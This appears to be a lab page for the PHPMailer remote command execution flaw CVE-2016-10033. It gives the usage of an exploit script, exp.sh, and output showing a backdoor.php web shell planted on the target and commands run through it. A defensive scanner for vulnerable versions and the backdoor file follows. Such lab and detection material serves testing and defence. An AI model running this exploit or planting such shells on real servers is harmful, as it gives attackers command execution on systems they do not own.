PHPMailer

< 5.2.18 Remote Command Execution (CVE-2016-10033)

How to use the exploit:

$ ./exp.sh host:port

Assuming the container is reachable at http://127.0.0.1:8000/ after it starts:

$ ./exp.sh 127.0.0.1:8000

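After it runs, wait patiently (it is slow, roughly within 2 minutes). A backdoor.php file is then written to the server (the physical path it is written to is set in exp.sh; by default it is written to the /var/www/html/ directory), and you will see the following output: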

➜ ./exp.sh 127.0.0.1:8000
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting 127.0.0.1:8000
[+] Target exploited, acessing shell at http://127.0.0.1:8000/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> id
[+] Running id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
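
The check below is an added defensive example, not part of the original lab or of exp.sh. It scans a web root for PHPMailer copies in the affected range (< 5.2.18) and for the backdoor.php file the run above leaves behind. It assumes PHPMailer 5.2.x keeps its release string in `public $Version` inside class.phpmailer.php; the function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example; function names are hypothetical, not from exp.sh.
FIXED="5.2.18"   # releases below this are affected, per this page's title

# version_lt A B: true when dotted version A is numerically older than B
# (a plain string compare would wrongly rank 5.2.9 above 5.2.18).
version_lt() {
  va=$1; vb=$2
  for _i in 1 2 3; do
    x=${va%%.*}; y=${vb%%.*}
    if [ "$x" -lt "$y" ]; then return 0; fi
    if [ "$x" -gt "$y" ]; then return 1; fi
    case $va in *.*) va=${va#*.} ;; *) va=0 ;; esac
    case $vb in *.*) vb=${vb#*.} ;; *) vb=0 ;; esac
  done
  return 1
}

# phpmailer_version FILE: print the release from `public $Version = '...'`
# (assumed layout of PHPMailer 5.2.x class.phpmailer.php).
phpmailer_version() {
  sed -n 's/.*\$Version *= *.\([0-9][0-9.]*\).*/\1/p' "$1" | head -n 1
}

# scan_webroot DIR: print findings; return 1 if any were found, 0 if clean.
scan_webroot() {
  root=$1
  findings=$(
    find "$root" -type f -name 'class.phpmailer.php' | while IFS= read -r f; do
      ver=$(phpmailer_version "$f")
      if [ -n "$ver" ] && version_lt "$ver" "$FIXED"; then
        echo "VULNERABLE PHPMailer $ver: $f"
      fi
    done
    # File name the exploit output on this page reports in the web root.
    if [ -f "$root/backdoor.php" ]; then echo "SUSPICIOUS $root/backdoor.php"; fi
  )
  if [ -z "$findings" ]; then return 0; fi
  printf '%s\n' "$findings"
  return 1
}

# make_sample_tree DIR VERSION: constructed fixture, not real PHPMailer code.
make_sample_tree() {
  mkdir -p "$1/vendor/phpmailer"
  printf "<?php\nclass PHPMailer {\n    public \$Version = '%s';\n}\n" "$2" \
    > "$1/vendor/phpmailer/class.phpmailer.php"
}

if [ "$#" -gt 0 ]; then scan_webroot "$1"; fi
```

Run it as `sh check.sh /var/www/html`; a non-zero exit status means at least one finding was printed.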